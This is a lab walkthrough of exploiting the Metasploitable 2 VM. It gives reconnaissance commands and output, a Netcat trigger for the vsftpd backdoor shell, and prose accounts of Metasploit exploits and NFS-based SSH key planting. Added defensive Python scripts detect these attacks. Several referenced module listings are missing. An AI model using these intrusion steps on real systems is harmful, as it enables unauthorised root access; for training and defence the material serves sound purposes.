Metasploitable 2 is a Linux-based virtual machine that contains several vulnerabilities which can be exploited using the Metasploit framework as well as other security tools.
- Used Netdiscover to identify the target IP of the remote machine.
- Used Nmap to banner-grab the services running on the open ports.
- Used Metasploit to exploit open ports and running services.
- Used Netcat for making a reverse shell.
- Metasploitable_2 [8825F2509A9B9A58EC66BD65EF83167F]
- Netdiscover [Can be found in Kali Linux]
- Nmap [Can be found in Kali Linux]
- Metasploit [Can be found in Kali Linux]
- Netcat [Can be found in Kali Linux]
As an initial stage, we downloaded the VM and imported it into VMware Workstation. After a successful import, we started discovering the target IP by running Netdiscover:
root@Hacker:~# netdiscover -r 192.168.2.0/24
192.168.2.7 00:0c:29:fa:dd:2a 01 060 VMware, Inc.
After discovering the target IP, we ran Nmap to identify its open ports. This gave us a long list of port numbers along with their state (open|closed|filtered), service, and version.
root@Hacker:~# nmap -sS -sV -p 1-10000 192.168.2.7
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-24 09:32 IST
Nmap scan report for 192.168.2.7
Host is up (0.00011s latency).
Not shown: 9974 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Later on, we started to exploit the ports one by one using Metasploit. Before exploiting anything, we did a Google search on each service version to determine whether it could be exploited.
A vulnerability assessment can also be run against the target IP to identify whether the running services are vulnerable to exploitation.
Vulnerability assessment tools: (1) Nessus (2) OpenVAS (3) Immunity Canvas (4) Qualys
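As an added example (not part of the original write-up), here is a small Python triage script that does the version-research step programmatically: it parses the Nmap service table above (an excerpt, embedded as constructed sample input) and flags the banners that the walkthrough later finds to be exploitable. The watch-list patterns and their notes are my own assumptions, not Nmap or Metasploit output; a real assessment would replace them with a maintained vulnerability feed.

```python
import re

# Constructed sample input: an excerpt of the Nmap service table from the scan above.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
6667/tcp open irc Unreal ircd
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
"""

# One "PORT STATE SERVICE VERSION" row: port/proto, state, service, free-text version.
ROW_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Watch-list (assumed, hand-maintained for this example): a regex tried against
# "service version" and a note saying why the banner deserves attention.
WATCHLIST = [
    (re.compile(r"vsftpd 2\.3\.4", re.I), "vsftpd 2.3.4: backdoor command execution"),
    (re.compile(r"samba smbd 3\.", re.I), "Samba 3.x: check for unauthenticated command execution"),
    (re.compile(r"grmiregistry", re.I), "exposed Java RMI registry"),
    (re.compile(r"metasploitable root shell", re.I), "unauthenticated root shell listener"),
    (re.compile(r"\bdistccd\b", re.I), "distccd runs compiler commands for any client"),
    (re.compile(r"unreal ircd", re.I), "UnrealIRCd: check for the backdoored release"),
    (re.compile(r"ruby drb", re.I), "Ruby DRb listener: remote code execution if exposed"),
    (re.compile(r"apache tomcat", re.I), "Tomcat manager: check for weak credentials"),
    (re.compile(r"^nfs\b", re.I), "NFS exported: review the export list"),
]


def parse_nmap(text):
    """Turn the Nmap service table into a list of dicts, skipping header and noise lines."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        rows.append({"port": int(port), "proto": proto, "state": state,
                     "service": service, "version": version})
    return rows


def triage(text):
    """Return the open ports whose banner matches a watch-list entry (first match wins)."""
    hits = []
    for row in parse_nmap(text):
        if row["state"] != "open":
            continue
        banner = f"{row['service']} {row['version']}"
        for pattern, note in WATCHLIST:
            if pattern.search(banner):
                hits.append({"port": row["port"], "service": row["service"], "note": note})
                break
    return hits


if __name__ == "__main__":
    for hit in triage(NMAP_OUTPUT):
        print(f"{hit['port']:>5}/tcp  {hit['service']:<12} {hit['note']}")
```

Run against the full scan, the script lists the same ports the rest of this write-up walks through and leaves the OpenSSH entry alone, which is the point: banner matching is a quick first filter, not a verdict, and each flagged service still needs the manual research the text describes.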
1. Gaining Shell via Metasploit
The virtual machine was found to be running an FTP service, vsftpd 2.3.4, which is vulnerable to backdoor command execution. We ran msfconsole in Kali Linux and searched for vsftpd, which gave us the exploit module for the backdoor command execution in vsftpd 2.3.4:
msf > search vsftpd
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
Finally, we gained a shell with the help of the Metasploit vsftpd backdoor module.
2. Gaining Shell via Netcat
We can also trigger the FTP backdoor with Netcat (which reads and writes to TCP and UDP network connections) to gain a shell.
First, run a command in a separate terminal to make a connection to port 21, sending USER anyname:) (including the smiley :) ) followed by a PASS command.
Then, without closing that terminal, open a new one and type the nc command shown below, where port 6200 is the backdoor port opened by the FTP service and -v enables verbose mode. You can also run it without -v; it only prints messages to standard error, such as when a connection occurs.
root@Hacker:~# nc 192.168.2.7 6200 -v
192.168.2.7: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.7] 6200 (?) open
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
eth0 Link encap:Ethernet HWaddr 00:0c:29:fa:dd:2a
inet addr:192.168.2.7 Bcast:192.168.2.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fefa:dd2a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:72642 errors:0 dropped:0 overruns:0 frame:0
TX packets:20426 errors:0 dropped:0 overruns:0 carrier:0
RX bytes:77577863 (73.9 MB) TX bytes:1589401 (1.5 MB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1670 errors:0 dropped:0 overruns:0 frame:0
TX packets:1670 errors:0 dropped:0 overruns:0 carrier:0
RX bytes:793069 (774.4 KB) TX bytes:793069 (774.4 KB)
Voila!!! Finally, we also got a shell with the help of the Netcat tool.
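From the defender's side, the backdoor trigger described above is easy to spot. The added Python example below (mine, not from the original post) applies two checks to constructed sample data: it looks for a username containing ":)" both in lines modelled on vsftpd's log format and in raw FTP USER commands as an IDS might record them, and it compares the listening ports from ss -ltn style output against an expected set so that the extra listener on 6200 stands out. The log and ss formats are assumptions; adapt the regexes to what your FTP daemon and tools actually write.

```python
import re

# Constructed sample lines in the style of vsftpd.log (format assumed; not from the lab VM).
VSFTPD_LOG = """\
Sun Aug 24 09:40:12 2014 [pid 2210] CONNECT: Client "192.168.2.5"
Sun Aug 24 09:40:15 2014 [pid 2209] [alice] OK LOGIN: Client "192.168.2.5"
Sun Aug 24 09:41:03 2014 [pid 2231] CONNECT: Client "192.168.2.9"
Sun Aug 24 09:41:05 2014 [pid 2230] [anyname:)] FAIL LOGIN: Client "192.168.2.9"
"""

# Constructed sample of raw FTP control-channel commands, "<client> <command>" per line,
# as an IDS or proxy might record them (format assumed).
FTP_COMMANDS = """\
192.168.2.5 USER alice
192.168.2.5 PASS ********
192.168.2.9 USER x:)
192.168.2.9 PASS whatever
"""

# Constructed sample in the shape of `ss -ltn` output on the FTP server (format assumed).
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      32     0.0.0.0:21         0.0.0.0:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
LISTEN 0      1      0.0.0.0:6200       0.0.0.0:*
"""

# vsftpd.log puts the username in brackets before the login result.
LOG_USER_RE = re.compile(r'\[pid \d+\] \[(?P<user>[^\]]*)\] .*Client "(?P<client>[^"]+)"')
# Raw command form: client address, then the FTP USER verb and its argument.
CMD_USER_RE = re.compile(r"^(?P<client>\S+) USER (?P<user>.*)$")
# Listening sockets: take the port from the "Local Address:Port" column.
LISTEN_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+\S+:(\d+)\s")


def suspicious_users(text):
    """Return (client, username) pairs whose username carries the ':)' trigger string."""
    hits = []
    for line in text.splitlines():
        m = LOG_USER_RE.search(line) or CMD_USER_RE.match(line.strip())
        if m and ":)" in m.group("user"):
            hits.append((m.group("client"), m.group("user")))
    return hits


def unexpected_listeners(text, expected_ports):
    """Return listening TCP ports not in the expected set (the backdoor opens 6200)."""
    found = set()
    for line in text.splitlines():
        m = LISTEN_RE.match(line.strip())
        if m:
            found.add(int(m.group(1)))
    return sorted(found - set(expected_ports))


if __name__ == "__main__":
    for client, user in suspicious_users(VSFTPD_LOG) + suspicious_users(FTP_COMMANDS):
        print(f"ALERT backdoor trigger in USER from {client}: {user!r}")
    for port in unexpected_listeners(SS_OUTPUT, {21, 22}):
        print(f"ALERT unexpected listener on tcp/{port}")
```

The listener check is the more robust of the two, because it does not depend on catching the login attempt: a server that should only offer FTP and SSH but suddenly listens on 6200 is wrong regardless of how that happened. Upgrading away from the backdoored 2.3.4 build removes the problem at the source.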
The version of the Samba server installed on the remote host is affected by a command execution vulnerability, and no authentication is needed to exploit it. We started Metasploit and chose the exploit module below, which helped us gain root access to the remote system.
Finally!!! We rooted the remote system using the Samba exploit.
RMI Registry Exploit
After a break, we analyzed the Nmap result along with some Google results and found that the remote rmiregistry on port 1099 was vulnerable. We exploited it using Metasploit to gain root access to the remote system.
The remote system was also running a service named shell on port 1524. We made a Netcat connection to the port and, wow, I was not prompted for any username or password; I got direct access to a root shell.
SSH through NFS
Network File System (NFS) was found to be open on port 2049, and RPC was also open on port 111. So we used rpcinfo to confirm NFS and showmount to identify the exported mount point, which we could then use to write a local file to the remote system.
root@Hacker:~# rpcinfo -p 192.168.2.7
program vers proto port service
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 47286 status
100024 1 tcp 43411 status
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100021 1 udp 58082 nlockmgr
100021 3 udp 58082 nlockmgr
100021 4 udp 58082 nlockmgr
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100021 1 tcp 51154 nlockmgr
100021 3 tcp 51154 nlockmgr
100021 4 tcp 51154 nlockmgr
100005 1 udp 47566 mountd
100005 1 tcp 44007 mountd
100005 2 udp 47566 mountd
100005 2 tcp 44007 mountd
100005 3 udp 47566 mountd
100005 3 tcp 44007 mountd
rpcinfo shows that NFS is open.
root@Hacker:~# showmount -e 192.168.2.7
Export list for 192.168.2.7:
Using showmount -e we found that the "/" share (the root of the file system) is being exported. By making use of this share, we started to access the system through a writable file system.
Based on the Nmap result, we found that the SSH service was running on port 22, so we generated a new SSH key on our attacking system. Then we created a new directory to mount the NFS export on, and added our key to the root user account's authorized_keys file.
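An audit of the conditions this section relies on, as an added Python example (not from the original post): it parses rpcinfo -p and showmount -e output in the format shown above, flags exports of the root file system and exports open to every host, and compares root's authorized_keys against an allow-list of known public keys so that a planted key is reported. The export line "/ *" is a constructed sample (the showmount listing above does not include it), and the key material is placeholder text, not real keys.

```python
import re

# Constructed sample of `rpcinfo -p` output (a subset of the listing above).
RPCINFO = """\
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100005    1   tcp  44007  mountd
"""

# Constructed sample of `showmount -e` output; the "/ *" export line is assumed here.
SHOWMOUNT = """\
Export list for 192.168.2.7:
/ *
/srv/data 192.168.2.0/24
"""

# Constructed authorized_keys content; the key blobs are placeholders, not real keys.
AUTHORIZED_KEYS = """\
# keys for root
ssh-rsa AAAAPLACEHOLDER-KNOWN-ADMIN-KEY admin@bastion
from="10.0.0.0/8" ssh-ed25519 AAAAPLACEHOLDER-BACKUP-KEY backup@nas
ssh-rsa AAAAPLACEHOLDER-UNKNOWN-KEY someone@laptop
"""

# Allow-list of (key type, key blob) pairs the administrators know about (assumed).
KNOWN_KEYS = {
    ("ssh-rsa", "AAAAPLACEHOLDER-KNOWN-ADMIN-KEY"),
    ("ssh-ed25519", "AAAAPLACEHOLDER-BACKUP-KEY"),
}

RPC_ROW_RE = re.compile(r"^(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)\s+(\S+)$")
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def rpc_services(text):
    """Map each RPC service name to the set of ports it is registered on."""
    services = {}
    for line in text.splitlines():
        m = RPC_ROW_RE.match(line.strip())
        if m:
            services.setdefault(m.group(5), set()).add(int(m.group(4)))
    return services


def risky_exports(text):
    """Flag exports of the root file system and exports open to every host."""
    findings = []
    for line in text.splitlines():
        if line.startswith("Export list") or not line.strip():
            continue
        path, _, clients = line.strip().partition(" ")
        clients = clients.strip()
        world = clients in ("*", "(everyone)") or "*" in clients.split(",")
        root_fs = path == "/"
        if world or root_fs:
            findings.append({"path": path, "clients": clients,
                             "root_fs": root_fs, "world": world})
    return findings


def unknown_keys(text, allowlist):
    """Return authorized_keys lines whose (type, blob) is not in the allow-list."""
    unknown = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # Skip a leading option string such as from="..." to reach the key type
        # (option strings containing spaces are not handled in this example).
        idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            unknown.append(line)  # an unparseable line deserves a look too
            continue
        if (fields[idx], fields[idx + 1]) not in allowlist:
            unknown.append(line)
    return unknown


if __name__ == "__main__":
    svc = rpc_services(RPCINFO)
    print("NFS registered on ports:", sorted(svc.get("nfs", ())))
    for f in risky_exports(SHOWMOUNT):
        print(f"RISK export {f['path']!r} to {f['clients']!r}: "
              f"root_fs={f['root_fs']} world={f['world']}")
    for k in unknown_keys(AUTHORIZED_KEYS, KNOWN_KEYS):
        print("UNKNOWN KEY:", k)
```

The fix on the server side is in /etc/exports: export only the directories that need sharing, list the client hosts or subnet explicitly instead of "*", and keep root_squash so a remote root user is mapped to an unprivileged account and cannot write to root's home directory even if the share is reachable.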
The remote machine was running an UnrealIRCd IRC daemon. We found that this version contains a backdoor that can be triggered by sending the letters "AB" followed by a system command to the server on any listening port.
Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.
Backdoor by Nature
distccd, a free distributed C/C++ compiler service, runs on port 3632 and was found to be vulnerable to a backdoor.
The problem with this service is that any user can easily abuse it to run a command of their choice and gain an interactive shell.
We obtained an interactive shell via the Metasploit module, as shown below.
Remote Code Execution
The drb service running on port 8787 was vulnerable to remote code execution. We exploited this vulnerability using the Metasploit module shown below.
For a while we were exploiting vulnerabilities only on the network side and had not exploited any of the web services.
So we decided to plant a web backdoor and looked for a suitable service to do so. Scanning the Nmap results by eye, we found an Apache Tomcat service running on port 8180. The following page will appear if you browse to this port with the
Take a look at the web page: you can see an Administration column containing: 1. Status 2. Tomcat Administration 3. Tomcat Manager.
We clicked on one of the links and an authentication page suddenly appeared, asking us to enter the password. When we saw this, we thought that we could not exploit the page. But that is not the case: we searched Metasploit for Tomcat modules and got a list of them. Then we ran the specific auxiliary module that would give us the username and password of the Tomcat administrator. The Metasploit auxiliary module is shown below.
After a while the scan completed and we got the username and password for the Tomcat administration, as shown below.
Now we could use this Tomcat username and password to gain an interactive shell with the Metasploit module below.
Finally we got our shell!!!!!
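The auxiliary module used above guesses manager credentials, which leaves a distinctive trail in Tomcat's access log. As an added Python example (mine, not part of the original post), the script below parses constructed access-log lines in the common log format, counts 401 responses to /manager per client, flags clients at or above a threshold, and notes whether a 200 followed the failures, which is what a guessed password that worked looks like. The sample lines, the "admin" user name in them and the threshold are assumptions.

```python
import re
from collections import OrderedDict

# Constructed sample Tomcat access-log lines in the common log format (shape assumed).
ACCESS_LOG = """\
192.168.2.5 - - [24/Aug/2014:10:02:01 +0530] "GET /manager/html HTTP/1.1" 401 2536
192.168.2.5 - - [24/Aug/2014:10:02:02 +0530] "GET /manager/html HTTP/1.1" 401 2536
192.168.2.5 - - [24/Aug/2014:10:02:02 +0530] "GET /manager/html HTTP/1.1" 401 2536
192.168.2.5 - - [24/Aug/2014:10:02:03 +0530] "GET /manager/html HTTP/1.1" 401 2536
192.168.2.5 - - [24/Aug/2014:10:02:03 +0530] "GET /manager/html HTTP/1.1" 401 2536
192.168.2.5 - admin [24/Aug/2014:10:02:04 +0530] "GET /manager/html HTTP/1.1" 200 11004
192.168.2.20 - - [24/Aug/2014:10:05:10 +0530] "GET /index.jsp HTTP/1.1" 200 1200
192.168.2.20 - admin [24/Aug/2014:10:06:00 +0530] "GET /manager/html HTTP/1.1" 200 11004
"""

# client, ident, authenticated user, timestamp, request line, status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def manager_activity(text):
    """Per client IP: number of 401s on /manager and whether a 200 came after them."""
    stats = OrderedDict()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m.group("path").startswith("/manager"):
            continue
        s = stats.setdefault(m.group("ip"),
                             {"failures": 0, "success_after_failures": False})
        status = m.group("status")
        if status == "401":
            s["failures"] += 1
        elif status == "200" and s["failures"] > 0:
            s["success_after_failures"] = True
    return stats


def flag_bruteforce(text, threshold=5):
    """Clients with at least `threshold` failed manager logins, in first-seen order."""
    return [ip for ip, s in manager_activity(text).items()
            if s["failures"] >= threshold]


if __name__ == "__main__":
    for ip, s in manager_activity(ACCESS_LOG).items():
        print(ip, s)
    print("flagged:", flag_bruteforce(ACCESS_LOG))
```

A client that fails repeatedly and then succeeds is the case worth paging on, since the credential is now known to someone. The underlying weakness is a guessable manager password and a manager application reachable from the network at all; Tomcat's manager should be restricted to trusted addresses and given a strong, unique password, and the access log should be shipped somewhere a check like this runs continuously rather than after the fact.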
It's time to end this pentesting roadmap of Metasploitable 2. Game over, guys. Stay tuned; each weekend I will be back with different VMs and different ways of getting the flag.